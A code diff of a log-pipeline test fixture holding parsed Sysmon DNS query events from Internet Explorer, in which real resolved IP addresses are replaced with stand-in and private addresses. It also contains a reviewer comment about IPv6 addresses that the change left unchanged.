Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", 
@@ -877,27 +875,27 @@
 },
 "answers": [
 {
- "data": "151.101.1.194",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.65.194",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.129.194",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.193.194",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "151.101.1.194",
- "151.101.65.194",
- "151.101.129.194",
- "151.101.193.194"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -912,16 +910,13 @@ "confiant-integrations.global.ssl.fastly.net" ], "ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313750228Z", + "ingested": "2021-12-09T13:49:44.739125300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -985,12 +980,12 @@ "type": "CNAME" }, { - "data": "20.36.253.92", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "network": { 
@@ -1006,13 +1001,13 @@ "c.msn.com" ], "ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313751459Z", + "ingested": "2021-12-09T13:49:44.739129700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -1080,17 +1075,17 @@ "type": "CNAME" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -1107,14 +1102,13 @@ "c.bing.com" ], "ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313752974Z", + "ingested": "2021-12-09T13:49:44.739134Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -1174,12 +1168,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -1194,13 +1188,13 @@ "contextual.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313754253Z", + "ingested": "2021-12-09T13:49:44.739138600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1276,12 +1270,12 @@ "type": "CNAME" }, { - "data": "152.195.32.120", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "network": { 
@@ -1300,13 +1294,13 @@ "at.atwola.com" ], "ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313755546Z", + "ingested": "2021-12-09T13:49:44.739142200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1374,15 +1368,15 @@ "type": "CNAME" }, { - "data": "204.13.192.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.120", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -1390,7 +1384,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -1398,7 +1392,7 @@
                         "type": "AAAA"
                     },
                     {
-                        "data": "192.26.92.30",
+                        "data": "192.168.92.30",
                         "type": "A"
                     },
                     {
@@ -1406,20 +1400,20 @@
                         "type": "AAAA"
                     },
                     {
-                        "data": "192.31.80.30",
+                        "data": "192.168.80.30",
                         "type": "A"
                     }
                 ],
                 "resolved_ip": [
-                    "204.13.192.56",
-                    "204.13.192.120",
-                    "192.5.6.30",
+                    "89.160.20.156",
+                    "89.160.20.156",
+                    "192.168.6.30",
                     "2001:503:a83e::2:30",
-                    "192.33.14.30",
+                    "192.168.14.30",
                     "2001:503:231d::2:30",
-                    "192.26.92.30",
+                    "192.168.92.30",
                     "2001:503:83eb::30",
-                    "192.31.80.30"
+                    "192.168.80.30"
                 ]
             },
             "network": {
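Review bot: The three IPv6 answers `2001:503:a83e::2:30`, `2001:503:231d::2:30` and `2001:503:83eb::30` in `resolved_ip` are left untouched while every IPv4 entry in the same list is rewritten to a supported or RFC 1918 address, so the fixture still carries publicly allocated addresses outside the 2001:db8::/32 documentation range, which is exactly the class of value this commit is removing. If the supported subset has no IPv6 member, `2001:db8::` addresses are the conventional stand-in; otherwise an IPv6 address from that subset should be used. Either way the replacement must be applied together to `dns.answers`, `dns.resolved_ip`, `related.ip` and the `QueryResults` text inside `event.original`, as this commit does for the IPv4 values, and presumably to the raw sample file the expected output is generated from. The four addresses moved into 192.168.0.0/16 will also lose any GeoIP enrichment the pipeline applies to DNS answers, which looks intended but is worth confirming against the pipeline definition.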
@@ -1436,21 +1430,20 @@ "m.adnxs.com" ], "ip": [ - "204.13.192.56", - "204.13.192.120", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313756773Z", + "ingested": "2021-12-09T13:49:44.739147Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", 
@@ -1514,12 +1507,12 @@
                         "type": "CNAME"
                     },
                     {
-                        "data": "74.6.137.78",
+                        "data": "89.160.20.156",
                         "type": "A"
                     }
                 ],
                 "resolved_ip": [
-                    "74.6.137.78"
+                    "89.160.20.156"
                 ]
             },
             "network": {
